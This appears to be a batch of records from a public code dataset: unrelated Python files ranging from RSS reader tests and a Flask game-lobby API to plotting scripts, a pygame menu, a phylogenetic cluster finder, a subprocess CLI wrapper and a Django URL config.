u\"mark@example.org\")\n self.assertEqual(post.category, [u\"Miscellaneous\"])\n self.assertEqual(post.rights, u\"\")\n self.assertEqual(post.title, u\"First item title\")\n self.assertEqual(post.subtitle, \"\")\n self.assertEqual(post.content, u\"Watch out for nasty tricks\")\n self.assertEqual(post.generator, u\"\")\n self.assertEqual(post.guid, u\"http://example.org/guid/1\")\n self.assertEqual(post.url, u\"http://example.org/item/1\")\n self.assertEqual(post.contributor, u\"\")\n self.assertEqual(post.updated, datetime.datetime(2002, 9, 5, 0, 0, 0, tzinfo=pytz.UTC))\n self.assertEqual(post.pubDate, datetime.datetime(2002, 9, 5, 0, 0, 0, tzinfo=pytz.UTC))\n\n # # RSS Specific fields\n # self.assertEqual(post.enclosure, [\"http://example.org/audio/demo.mp3\"])\n # self.assertEqual(post.comments, \"http://example.org/comments/1\")\n\n def test_post_no_feed(self):\n \"\"\" Test that we cannot create a post with the feed field = null\"\"\"\n def badPostConstruction():\n p = RSS()\n self.assertRaises(IntegrityError, badPostConstruction())\n\n def test_minimal_post(self):\n \"\"\" Test that we can create a post with the minimal amount of data \"\"\"\n f = Feed()\n def wrap():\n exceptionRaised = False\n try:\n p = RSS({\"feed\" : f})\n except Exception:\n exceptionRaised = True\n return exceptionRaised\n self.assertEquals(wrap(), False)\n","repo_name":"CombustibleLemons/rss-reader","sub_path":"rss_reader/main/tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":23847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34015137399","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nlobbies = {}\n\n@app.route('/create', methods=['POST'])\ndef create_lobby():\n data = request.get_json()\n lobby_id = data['lobby_id']\n lobby_name = data['lobby_name']\n\n if lobby_id in lobbies:\n return 
jsonify({'error': 'Lobby with this ID already exists'}), 400\n\n lobbies[lobby_id] = {'name': lobby_name, 'users': []}\n return jsonify({'success': 'Lobby created successfully'}), 201\n\n@app.route('/join', methods=['POST'])\ndef join_lobby():\n data = request.get_json()\n lobby_id = data['lobby_id']\n user = data['user']\n\n if lobby_id not in lobbies:\n return jsonify({'error': 'Lobby with this ID does not exist'}), 404\n\n lobby = lobbies[lobby_id]\n lobby['users'].append(user)\n return jsonify({'success': 'User added to lobby successfully'}), 200\n\n@app.route('/leave', methods=['POST'])\ndef leave_lobby():\n data = request.get_json()\n lobby_id = data['lobby_id']\n user = data['user']\n\n if lobby_id not in lobbies:\n return jsonify({'error': 'Lobby with this ID does not exist'}), 404\n\n lobby = lobbies[lobby_id]\n lobby['users'].remove(user)\n return jsonify({'success': 'User removed from lobby successfully'}), 200\n\n@app.route('/list', methods=['GET'])\ndef list_lobbies():\n return jsonify({'lobbies': lobbies}), 200\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"come219/blackjacks","sub_path":"backend_blackjack/flask_lobbyblackjack_v0/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41399712238","text":"import turtle\n\n\n# 多边形外角和等于360\n# t:函数Turtle的对象 length:边长 n:外角\ndef polygon(t, length, n):\n angle = 360 / n # 没必要放到for循环里\n for i in range(n):\n t.fd(length)\n t.lt(angle)\n\n\nbob = turtle.Turtle()\nfor j in range(5):\n polygon(bob, float(input(\"Please input length:\")),\n int(input(\"Please input n-sided:\")))\nturtle.done()\n","repo_name":"Delayless/Think_Python","sub_path":"Chapter-4/4.3.3.py","file_name":"4.3.3.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9244426016","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef hypocycloid(b):\n\ttheta = np.arange(0, 2*np.pi, 0.001)\n\ta = float(b * 0.5 + 0.5)\n\t\n\tgc= colors[b]\n\tlabels = 'a = '+str(a)\n\tx = a * (np.cos(theta))**3\n\ty = a * (np.sin(theta))**3\n\tax.plot(x, y, color = gc, label = labels)\n\treturn\n\ncolors = ['purple', 'b', 'g', 'y', 'orange', 'r']\nax = plt.subplot(111)\nfor b in list(range(5)):\n\thypocycloid(b)\nax.set_title(\n\tr'Hypocycloid $x^{2/3}+y^{2/3}=a^{2/3}$')\nlegend = ax.legend(loc='lower left', shadow=True)\nframe = legend.get_frame()\nframe.set_facecolor('0.90')\nfor label in legend.get_texts():\n\tlabel.set_fontsize('large')\nfor label in legend.get_lines():\n\tlabel.set_linewidth(1.5)\nplt.show()\n","repo_name":"Jeffery-M-Thompson/computational_physics","sub_path":"01_08_hypocycloid.py","file_name":"01_08_hypocycloid.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1157680846","text":"#Write a program to find the sum and product of all elements of a list.\n\nn=int(input(\"enter the limit of the list : \"))\nlst=[]\nproduct=1\nfor i in range(0,n):\n x=int(input(\"enter the elements to list : \"))\n lst.append(x)\n product=product*x\n\nsum_lst=sum(lst)\n\n\nprint(\"the sum of list : %d \" %sum_lst)\nprint(\"the product of list : %d \" %product)\n","repo_name":"sreerajch657/internship","sub_path":"practise questions/product and sum list.py","file_name":"product and sum 
list.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2145933040","text":"#!/usr/bin/env python3\n\nguest = [x for x in input()]\nhost = [x for x in input()]\nletters = [x for x in input()]\n\nsortedLetters = sorted(letters)\nsortedExpected = sorted(guest + host)\nif sortedLetters == sortedExpected:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"FlorentRevest/WCPS2017","sub_path":"amusing-joke.py","file_name":"amusing-joke.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26359779747","text":"import requests\nimport bs4 as bs\nimport yfinance as yf\nimport numpy as np\nimport glob\nimport pandas as pd\n\nclass StockUniverse:\n\n def __init__(self):\n self.start_date = '2000-01-03' # actual B.D. after the 1st January\n self.end_date = \"2023-03-03\"\n self.size_universe = 15\n self.path = r\"C:\\Users\\mager\\Desktop\\Master's Thesis\\Market_Data\"\n self.filename = self.path + '/sp500_historical_data.parquet'\n\n def get_sp500_history_data(self):\n \"\"\"\n Gets stock data for each stock in the SP from start date to end date.\n :return df:\n \"\"\"\n file = glob.glob(self.filename)\n if len(file) == 1: # Means data exists\n df = pd.read_parquet(file[0])\n else:\n # Requesting the composition of the SP\n resp = requests.get('http://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\n soup = bs.BeautifulSoup(resp.text, 'lxml')\n table = soup.find('table', {'class': 'wikitable sortable'})\n\n # Building the tickers\n tickers = []\n\n for row in table.findAll('tr')[1:]:\n ticker = row.findAll('td')[0].text\n tickers.append(ticker)\n\n tickers = [s.replace('\\n', '') for s in tickers]\n data = yf.download(tickers, start=self.start_date, end=self.end_date) # Note for improvement; check in the\n # yf module if requests are done async\n\n df = data.stack().reset_index().rename(index=str, columns={\"level_1\": \"Symbol\"}).sort_values(['Symbol', 'Date'])\n df[\"market_cap\"] = df[\"Close\"] * df[\"Volume\"]\n return df\n\n def get_list_tickers(self, df):\n \"\"\"\n Gets the list of 15 stocks which have been present in the SP from start date to end date and have the highest\n market capitalization as of end date.\n :param df:\n :return tickers:\n \"\"\"\n first_date_df = df[df[\"Date\"] == self.start_date]\n ticker_list = first_date_df['Symbol'].tolist()\n # Get all tickers present throughout the whole period\n for date in df[\"Date\"].unique():\n date_df = df[df[\"Date\"] == date]\n date_ticker_list = date_df['Symbol'].tolist()\n ticker_list = list(set(ticker_list).intersection(date_ticker_list))\n last_date_df = df[df[\"Date\"] == self.end_date]\n last_date_df = last_date_df[last_date_df[\"Symbol\"].isin(ticker_list)].sort_values(by=\"market_cap\", ascending=False)[\"Symbol\"].head(self.size_universe)\n tickers = last_date_df.to_list()\n return tickers\n\n @staticmethod\n def get_summary_universe(df, tickers):\n \"\"\"\n Computes the min, max and mean log close prices & log vol for the selected stocks\n :param df:\n :param tickers:\n :return grouped:\n \"\"\"\n # filter the DataFrame to include only the symbols in symbol_list\n symbol_df = df[df['Symbol'].isin(tickers)]\n symbol_df[\"Log Close\"] = np.log(symbol_df[\"Close\"])\n symbol_df[\"Log Open\"] = np.log(symbol_df[\"Open\"])\n\n symbol_df[\"Daily RV\"] = abs(symbol_df[\"Log Close\"] - symbol_df[\"Log Open\"])\n\n # 
calculate the desired statistics by group\n grouped = symbol_df.groupby('Symbol').agg(\n {'Log Close': ['min', 'max', 'mean'], 'Daily RV': ['min', 'max', 'mean']}\n )\n\n print(grouped.head().to_string())\n # rename columns\n grouped.columns = ['Min log close price', 'Max log close price', 'Mean log close price',\n 'Min daily volatility', 'Max daily volatility', 'Mean daily volatility']\n\n # sort the DataFrame by market capitalization\n grouped = grouped.sort_values(by='Symbol', ascending=False)\n\n # reset the index to have a clean DataFrame with one row per symbol\n grouped = grouped.reset_index()\n return grouped\n\n def run(self):\n df_sp = self.get_sp500_history_data()\n tickers = self.get_list_tickers(df_sp)\n return tickers\n","repo_name":"albanmgd/Master_Thesis_203","sub_path":"4_Implementation/stock_universe.py","file_name":"stock_universe.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33254427349","text":"import pygame\nfrom pygame.locals import *\nfrom Constants import *\nfrom DynamicTexts import *\n\nclass MainMenu(pygame.sprite.Sprite):\n \"\"\"\n The Main Menu!\n Returns: menu object\n Functions: tbd\n Attributes: image, rect, logo, startBtn, startBtn_rect, exitBtn, exitBtn_rect\n \"\"\"\n def __init__(self):\n #Call the parent class (Sprite) constructor\n pygame.init()\n pygame.sprite.Sprite.__init__(self)\n\n self.background = pygame.image.load('images/hardwoodFloor.jpg').convert()\n self.image=pygame.Surface(SCREEN_SIZE)\n self.rect=self.image.get_rect()\n \n self.font = pygame.font.Font('fonts/ARBUCKLE.TTF', 22)\n self.textControls1 = self.font.render(CONTROLS1, True, WHITE)\n self.textControls1_rect = self.textControls1.get_rect()\n self.textControls2 = self.font.render(CONTROLS2, True, WHITE)\n self.textControls2_rect = self.textControls2.get_rect()\n self.textControls1_shadow = self.font.render(CONTROLS1, True, BLACK)\n self.textControls1_shadow_rect = self.textControls1_shadow.get_rect()\n self.textControls2_shadow = self.font.render(CONTROLS2, True, BLACK)\n self.textControls2_shadow_rect = self.textControls2_shadow.get_rect()\n \n self.logo = pygame.image.load('images/menu/logo.png').convert_alpha()\n self.logo_rect = self.logo.get_rect()\n self.logo_rect.midtop = self.rect.midtop\n \n self.logo_anim=['images/menu/logo_01.png','images/menu/logo_02.png','images/menu/logo_03.png','images/menu/logo_04.png','images/menu/logo_05.png','images/menu/logo_06.png','images/menu/logo_07.png']\n \n self.textControls1_rect.midtop = self.logo_rect.midbottom\n self.textControls1_rect=self.textControls1_rect.move(0,-3)\n self.textControls2_rect.midtop = self.textControls1_rect.midbottom\n self.textControls2_rect=self.textControls2_rect.move(0,+5)\n self.textControls1_shadow_rect.midtop = self.textControls1_rect.midtop\n self.textControls2_shadow_rect.midtop = self.textControls2_rect.midtop\n self.textControls1_shadow_rect=self.textControls1_shadow_rect.move(-1,+1)\n self.textControls2_shadow_rect=self.textControls2_shadow_rect.move(-1,+1)\n \n \n self.startBtn = pygame.image.load('images/menu/startBtn.png').convert_alpha()\n self.startBtn_rect = self.startBtn.get_rect()\n self.exitBtn = pygame.image.load('images/menu/exitBtn.png').convert_alpha()\n self.exitBtn_rect = self.exitBtn.get_rect()\n self.startBtn_rect.midbottom = self.rect.midbottom\n self.startBtn_rect = self.startBtn_rect.move(-150,-10)\n self.exitBtn_rect.midbottom = self.rect.midbottom\n self.exitBtn_rect = 
self.exitBtn_rect.move(+150,-10)\n self.image.blit(self.background, self.rect)\n self.image.blit(self.textControls1_shadow, self.textControls1_shadow_rect)\n self.image.blit(self.textControls2_shadow, self.textControls2_shadow_rect)\n self.image.blit(self.textControls1, self.textControls1_rect)\n self.image.blit(self.textControls2, self.textControls2_rect)\n self.image.blit(self.logo, self.logo_rect)\n self.image.blit(self.startBtn, self.startBtn_rect)\n self.image.blit(self.exitBtn, self.exitBtn_rect)\n self.i=0\n \n def update(self):\n #print(self.i)\n self.logo=pygame.image.load(self.logo_anim[self.i]).convert_alpha()\n if (self.i<(len(self.logo_anim)-1)):self.i+=1\n else: self.i=0\n self.image.blit(self.background, self.rect)\n self.image.blit(self.textControls1_shadow, self.textControls1_shadow_rect)\n self.image.blit(self.textControls2_shadow, self.textControls2_shadow_rect)\n self.image.blit(self.textControls1, self.textControls1_rect)\n self.image.blit(self.textControls2, self.textControls2_rect)\n self.image.blit(self.logo, self.logo_rect)\n self.image.blit(self.startBtn, self.startBtn_rect)\n self.image.blit(self.exitBtn, self.exitBtn_rect)","repo_name":"word-dudely/Baby-Daddy","sub_path":"MainMenu.py","file_name":"MainMenu.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18929364829","text":"#!/usr/bin/env python\n\nimport sys\nimport ete3\nimport optparse\nfrom ete3 import Tree, NodeStyle, AttrFace, faces, TreeStyle, SeqMotifFace\nimport random\n\nparser=optparse.OptionParser()\nparser.add_option('-i', '--infile', help='Treefile to visualize', type='str')\nparser.add_option('-l', '--leafnames', default= '',help='', type='str')\nparser.add_option('-t', '--nonbinary', action=\"store_true\", default=False)\nparser.add_option('-c', '--clusterIDs', default = 'deer/USA/OH-OSU', type = 'str')\nparser.add_option('-r', '--root', default= \"\", help='', type='str')\nparser.add_option('-f','--format',default = 0, help='default format is 0 format in ete3',type = 'int')\nparser.add_option('-o', '--outfile', help='path to final pdf', default = 'tree_colored.pdf', type='str')\nparser.add_option('-n', '--node', help='use internal nodes names as cluster ids', action=\"store_true\", default=False)\nparser.add_option('-e', '--onlyReroot', action=\"store_true\", default=False)\nparser.add_option('-u', '--clusteroutfile', default = '', type = 'str')\n\n##get options\noptions, args=parser.parse_args()\ntree = ete3.Tree(options.infile, format=options.format) #input tree is from treetime and nonbinary\nroot = options.root\noutfile = options.outfile\nnbchecker = options.nonbinary\nclnodeid = options.node\nonlyReroot=options.onlyReroot\nclusterIDs=options.clusterIDs\nclustersoutfile=options.clusteroutfile\n\n#cutoff is needed if tree is binary\ncutoff = 1e-05\n\nif not root == \"\":\n\ttree.set_outgroup(tree&root)\n\t\nif onlyReroot:\n\ttree.write(format=0, outfile=options.infile+\"_rerooted.nwk\")\n\texit()\n\t\n\ndef convert_to_nonbinary(t, threshold):\n\tfor node in t.iter_descendants(\"postorder\"):\n\t\t#print node.dist\n\t\tif node.dist < threshold:\n\t\t\tif not node.is_leaf():\n\t\t\t\tfor child in node.children:\n\t\t\t\t\t(node.up).add_child(child, dist = child.dist)\n\t\t\t\tnode.detach()\n\treturn(t)\n\nif not nbchecker: #check whether the input tree is nonbinary\n\ttree = convert_to_nonbinary(tree, cutoff)\n\t#tree.write(format=1, outfile=options.infile+\"_nonbinary.nwk\")\n\t\n####Go 
around the tree and find clusters of Ohio deers\n\nclusters = {}\nnum = 1\n\nfor node in tree.iter_descendants(\"postorder\"):\n\tif node.is_leaf():\n\t\tif clusterIDs in node.name:\n\t\t\tnode.add_feature('state',1)\n\t\telse:\n\t\t\tnode.add_feature('state',0)\n\telse:\n\t\tnode.state = 1\n\t\tohdeer = []\n\t\tnonohdeer = 0\n\t\tfor no in node.children:\n\t\t\tif no.state == 1:\n\t\t\t\tohdeer.append(no)\n\t\t\telse:\n\t\t\t\tnonohdeer +=1\n\t\tif nonohdeer > 0:\n\t\t\tnode.state = 0\n\t\t\tif len(ohdeer) > 0:\n\t\t\t\tfor child in ohdeer:\n\t\t\t\t\tif not child.is_leaf() and child.dist > cutoff: ### the child is a cluster founder if it is internal (has at least two terminal descendants) and russian\n\t\t\t\t\t\tif clnodeid:\n\t\t\t\t\t\t\tclusters[node.name] = child.get_leaf_names()\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tclusters[num] = child.get_leaf_names()\n\t\t\t\t\t\t\tnum +=1\n###\t\n#Print clusters and save to file\nclouf = ''\nif clustersoutfile == '':\n\tclouf = options.infile+\".clusters\"\nelse:\n\tclouf = clustersoutfile\nwith open(clouf, 'w') as outf:\n\tfor k in clusters:\n\t\t\t####print clusters\n\t\tfor elem in clusters[k]:\n\t\t\tprint (str(k)+\"\\t\"+elem.replace(\"\\'\",\"\"))\n\t\t\toutf.write(str(k)+\"\\t\"+elem.replace(\"\\'\",\"\")+\"\\n\")\n\t\n##Visualize\ndef layout(node):\n\tif node.is_leaf():\n\t\tif \"/deer/\" in node.name:\n\t\t\tdeerdesc = faces.AttrFace(\"name\", fsize=10)\n\t\t\tdeerdesc.margin_left = 25\n\t\t\tfaces.add_face_to_node(deerdesc, node, 0, aligned=False)\n\t\telse:\n\t\t\tif \"_\" in node.name:\n\t\t\t\tnode.name = node.name.replace(\"_\",\" \")\n\t\t\thumandesc = faces.AttrFace(\"name\", fsize=7)\n\t\t\thumandesc.margin_left = 5\n\t\t\thumandesc.margin_bottom = 1\n\t\t\thumandesc.margin_top = 1\n\t\t\thumandesc.margin_right = 5\n\t\t\tfaces.add_face_to_node(humandesc, node, 0, aligned = False)\n\nts = TreeStyle()\nts.branch_vertical_margin = 0.1\n#ts.root_opening_factor = 1\nts.arc_start = 180 # 0 degrees = 3 o'clock\nts.arc_span = 355\n#ts.mode = \"c\"\n#ts.scale = 2000000\nts.tree_width = 3000\nts.show_leaf_name = False\n#ts.draw_guiding_lines =True\n#ts.guiding_lines_type = 2\n#ts.show_branch_support = True\nts.layout_fn = layout\n\nwidthsingl = 10 #2\nwidthcluster = 10 #2\n\nsingletoncolor = \"#1b9e77\" #\"%06x\" % random.randint(0, 0xFFFFFF)\notherdeercolor = \"#d95f02\"\nohdeerStyle = NodeStyle()\nohdeerStyle['hz_line_color'] = singletoncolor\nohdeerStyle['vt_line_color'] = singletoncolor\nohdeerStyle['hz_line_width'] = widthsingl\nohdeerStyle['vt_line_width'] = widthsingl\nohdeerStyle[\"fgcolor\"] = \"black\"\nohdeerStyle[\"size\"] = 1\n\ndeerStyle = NodeStyle()\ndeerStyle['hz_line_color'] = otherdeercolor\ndeerStyle['vt_line_color'] = singletoncolor\ndeerStyle['hz_line_width'] = widthsingl\ndeerStyle['vt_line_width'] = widthsingl\nohdeerStyle[\"fgcolor\"] = \"black\"\nohdeerStyle[\"size\"] = 1\n\ngeneralStyle = NodeStyle()\ngeneralStyle[\"fgcolor\"] = \"black\"\ngeneralStyle[\"size\"] = 1\n\nfor leaves in tree:\n\tif \"/deer/\" in leaves.name:\n\t\tif clusterIDs in leaves.name:\n\t\t\tleaves.set_style(ohdeerStyle)\n\t\telse:\n\t\t\tleaves.set_style(deerStyle)\n\telse:\n\t\tleaves.set_style(generalStyle)\n\ncolorlist = [\"#8dd3c7\",\"#ffffb3\",\"#bebada\",\"#fb8072\",\"#80b1d3\",\"#fdb462\",\"#b3de69\",\"#fccde5\",\"#d9d9d9\",\"#bc80bd\",\"#ccebc5\",\"#ffed6f\",\"#7fc97f\",\"#beaed4\",\"#fdc086\",\"#ffff99\",\"#386cb0\",\"#f0027f\", \"#e08214\",\"#fdb863\",\"#fee0b6\",\"#f7f7f7\",\"#d8daeb\",\"#b2abd2\"]\n\nj=0\nfor clid in 
clusters:\n\t#set styles for clusters\n\tstylename = \"nsStyle\"+str(clid)\n\tleafstylename =\"lsStyle\"+str(clid)\n\texec(stylename+\"=NodeStyle()\")\n\ttransp = \"66\"\n\tcolor = colorlist[j]+ transp #Additional digits are for transparency\n\t#print(\"%i %s\" %(clid,color))\n\texec(stylename+\"['bgcolor'] = '\"+color+\"'\")\n\texec(stylename+\"['hz_line_color'] = 'black'\")\n\texec(stylename+\"['vt_line_color'] = 'black'\")\n\texec(stylename+\"['vt_line_width'] = \"+str(widthcluster))\n\texec(stylename+\"['hz_line_width'] = \"+str(widthcluster))\n\t\n\texec(leafstylename+\"=NodeStyle()\")\n\texec(leafstylename+\"['vt_line_width'] = \"+str(widthcluster))\n\texec(leafstylename+\"['hz_line_width'] = \"+str(widthcluster))\n\texec(leafstylename+\"['hz_line_color'] = 'black'\")\n\texec(leafstylename+\"['vt_line_color'] = 'black'\")\n\t\n\t###use it to set styles for clusters\n\tfor n in tree.get_common_ancestor(clusters[clid]).traverse():\n\t\texec(\"n.set_style(lsStyle\"+str(clid)+\")\")\n\tcommonnode = tree.get_common_ancestor(clusters[clid])\n\texec(\"commonnode.set_style(nsStyle\"+str(clid)+\")\")\n\tj+=1\n\n\n\n\n\n#tree.show(tree_style=ts)\n\ntree.render(outfile, w = 1200, units= 'px', dpi = 350, tree_style = ts)\n","repo_name":"garushyants/sars_cov_2_deer_Ohio","sub_path":"scripts/vizualize_tree.py","file_name":"vizualize_tree.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"1270176713","text":"from btconfig.configutils import AttrDict\nfrom btecli.lib.logger import Logger\nfrom btecli.lib.shell.which import which\nimport os\nimport re\nimport sys\nfrom subprocess import Popen, PIPE, STDOUT, call, run\nimport threading\nimport time\n\n# Import third-party and custom modules\ntry:\n from btecli.lib.shell import shell_map\n import colorama\nexcept ImportError as e:\n print('Error in %s ' % os.path.basename(__file__))\n print('Failed to import at least one required module')\n print('Error was %s' % e)\n print('Please install/update the required modules:')\n print('pip install -U -r requirements.txt')\n sys.exit(1)\n\ncolorama.init(convert=True, autoreset=True) # Needed for Windows, supposedly ignored by linux\n\n# Setup Logging\nlogger = Logger().init_logger(__name__)\n\nclass CliInvocation:\n\n def __init__(self):\n\n self.proc = None\n self.done = False\n self.invocation = type('obj', (object,), {\n 'stdout': None,\n 'failed': False,\n 'returncode': 0\n }\n ) \n self.logger = logger\n\n def call(self, **kwargs):\n \n cmd = [kwargs['cmd_spec']]\n cmd_args = kwargs.get('cmd_args', [])\n ext = kwargs['cmd_ext']\n cmd_invocation = kwargs.get('invocation')\n cmd_is_interactive = kwargs.get('interactive')\n debug_enabled = kwargs.get('debug_enabled', False)\n suppress_output = kwargs.get('suppress_output', False)\n exe = shell_map[ext]['invocation'][cmd_invocation]['executable']\n \n # Adjust shell environment\n curr_env = os.environ.copy()\n env_variables = kwargs['env_variables']\n modified_env = AttrDict.merge(curr_env, env_variables)\n\n if exe is None:\n self.logger.error(\"Specified executable is invalid, got '%s'\" % exe)\n sys.exit(1) \n executable = which(exe)\n if not executable:\n self.logger.error('No executable found for %s' % exe)\n sys.exit(1)\n if debug_enabled:\n process_invocation = [executable] + shell_map[ext]['invocation'][cmd_invocation]['flags_w_debug'] + cmd + cmd_args\n else:\n process_invocation = [executable] + 
shell_map[ext]['invocation'][cmd_invocation]['flags'] + cmd + cmd_args\n self.logger.debug('Process Invocation: %s' % process_invocation)\n if cmd_is_interactive:\n call(process_invocation, shell=True, env=modified_env)\n sys.exit()\n else:\n def thread_target():\n try:\n if sys.version_info[0] >= 3:\n with Popen(process_invocation, \n stdout=PIPE, \n stderr=STDOUT, \n bufsize=1, \n universal_newlines=True, \n env=modified_env\n ) as self.proc:\n if not suppress_output:\n for line in self.proc.stdout:\n sys.stdout.write(line) # process line here\n if self.proc.returncode != 0:\n self.invocation.failed = True\n self.invocation.returncode = p.returncode\n self.invocation.stdout = 'Encountered error code {errcode} in the specified command {args}'.format(\n errcode=p.returncode, args=p.args)\n self.done = True\n self.done = True\n self.invocation.returncode = self.proc.returncode\n else:\n # Invoke process\n self.proc = Popen(\n process_invocation,\n stdout=PIPE,\n stderr=STDOUT)\n # Poll for new output until finished\n while True:\n nextline = self.proc.stdout.readline()\n if nextline == '' and self.proc.poll() is not None:\n break\n if not suppress_output: \n sys.stdout.write(nextline)\n sys.stdout.flush()\n self.done = True\n self.invocation.returncode = self.proc.returncode\n except Exception:\n self.done = True\n\n try:\n if sys.version_info[0] >= 3:\n t = threading.Thread(target=thread_target, daemon=True)\n else:\n t = threading.Thread(target=thread_target)\n t.start()\n except Exception:\n pass\n try:\n while not self.done:\n time.sleep(0.1)\n return self.invocation\n\n except KeyboardInterrupt:\n print(\"KeyboardInterrupt\")\n try:\n self.proc.terminate()\n except Exception:\n pass","repo_name":"berttejeda/bert.ecli","sub_path":"btecli/lib/proc/local_invocation.py","file_name":"local_invocation.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13908646682","text":"\"\"\"onlinecourseappblue_24214 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom allauth.account.views import confirm_email\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nfrom users.api.viewsets import UserVerificationAPIView\nfrom users.views import register_by_access_token, UserRegister, AppleLogin\n\nurlpatterns = [\n path(\"\", include(\"home.urls\")),\n path(\"accounts/\", include(\"allauth.urls\")),\n path(\"api/v1/\", include(\"home.api.v1.urls\")),\n path(\"api/v1/\", include(\"course.api.v1.urls\")),\n path(\"admin/\", admin.site.urls),\n path(\"users/\", include(\"users.urls\", namespace=\"users\")),\n path(\"rest-auth/\", include(\"rest_auth.urls\")),\n # Override email confirm to use allauth's HTML view instead of rest_auth's API view\n path(\"rest-auth/registration/account-confirm-email//\", confirm_email),\n path(\"rest-auth/registration/\", include(\"rest_auth.registration.urls\")),\n path(\"rest-auth/register/\", UserRegister.as_view()),\n path(\"rest-auth/user-verification/\", UserVerificationAPIView.as_view()),\n path(\"api/v1/\", include(\"course.api.v1.urls\")),\n path(\"api/v1/\", include(\"notifications.api.v1.urls\")),\n path(\"home/\", include(\"home.urls\")),\n path(\"course/\", include(\"course.urls\")),\n url('^register-by-token/apple/$', AppleLogin.as_view({'post': 'create'})),\n url('^register-by-token/(?P[^/]+)/$', register_by_access_token),\n path('auth/', include('social_django.urls', namespace='social')),\n path('grappelli/', include('grappelli.urls')),\n path(\"stripe/\", include(\"djstripe.urls\", namespace=\"djstripe\")),\n path(\"payments/\", include('payments.urls'))\n]\n\nadmin.site.site_header = \"OnlineCourseAppBP\"\nadmin.site.site_title = \"OnlineCourseAppBP Admin Portal\"\nadmin.site.index_title = \"OnlineCourseAppBP Admin\"\n\n# swagger\nschema_view = get_schema_view(\n openapi.Info(\n title=\"OnlineCourseAppBlueprint API\",\n default_version=\"v1\",\n description=\"API documentation for OnlineCourseAppBlueprint App\",\n ),\n public=True,\n permission_classes=(permissions.IsAuthenticated,),\n)\n\nurlpatterns += [\n path(\"api-docs/\", schema_view.with_ui(\"swagger\", cache_timeout=0), name=\"api_docs\")\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n urlpatterns += [url(r'^silk/', include('silk.urls', namespace='silk'))]\n","repo_name":"crowdbotics-apps/onlinecourseappblue-24214","sub_path":"backend/onlinecourseappblue_24214/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4220181208","text":"\"\"\"\r\nGiven an array of n integers : A1,A2,...,An, find the longest size subsequence which satisfies the following property:\r\nThe xor of adjacent integers in the subsequence must be non-decreasing.\r\n\r\nTiming:1sec\r\nlevel:5\r\n\r\nInput Description:\r\nFirst line contains an integer n, denoting the length of the array.\r\nSecond line will contain n space separated integers, denoting the elements of the array.\r\n\r\nOutput Description:\r\nOutput a single integer denoting the longest size of subsequence with the given property.\r\n\r\nConstraints\r\n 1≤n≤103\r\n 0≤Ai≤1018\r\n\r\nInput:\r\n8\r\n1 200 3 0 400 4 1 
